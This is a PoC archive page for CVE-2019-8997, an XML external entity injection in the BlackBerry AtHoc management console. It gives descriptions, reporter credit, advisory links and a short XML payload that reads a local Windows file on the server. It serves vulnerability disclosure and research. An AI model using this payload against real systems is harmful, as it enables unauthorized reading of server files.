Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-8997 PoC — BlackBerry AtHoc 安全漏洞

Source
Associated Vulnerability
Title:BlackBerry AtHoc 安全漏洞 (CVE-2019-8997)
Description:BlackBerry AtHoc 7.6 HF-567之前版本中的Management System存在XML外部实体注入漏洞。攻击者可通过输入恶意制作的XML利用该漏洞从应用程序服务器上读取任意的本地文件或在网络上发送请求。
Description
An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field.
Readme
# CVE-2019-8997
An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field.

## Reported By
Nolan B. Kennedy (nxkennedy)

## Security Advisory
http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
<br>
https://nvd.nist.gov/vuln/detail/CVE-2019-8997

## Blog Post
https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
<br>
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/

## Proof of Concept Exploit
```xml
<!DOCTYPE doc [
<!ELEMENT doc ANY > 
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">

<doc>&foo;</doc>

<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>
```

File Snapshot

[4.0K] /data/pocs/a40a5b009e2356feb599436a89391e8701f28ad8 └── [1.1K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.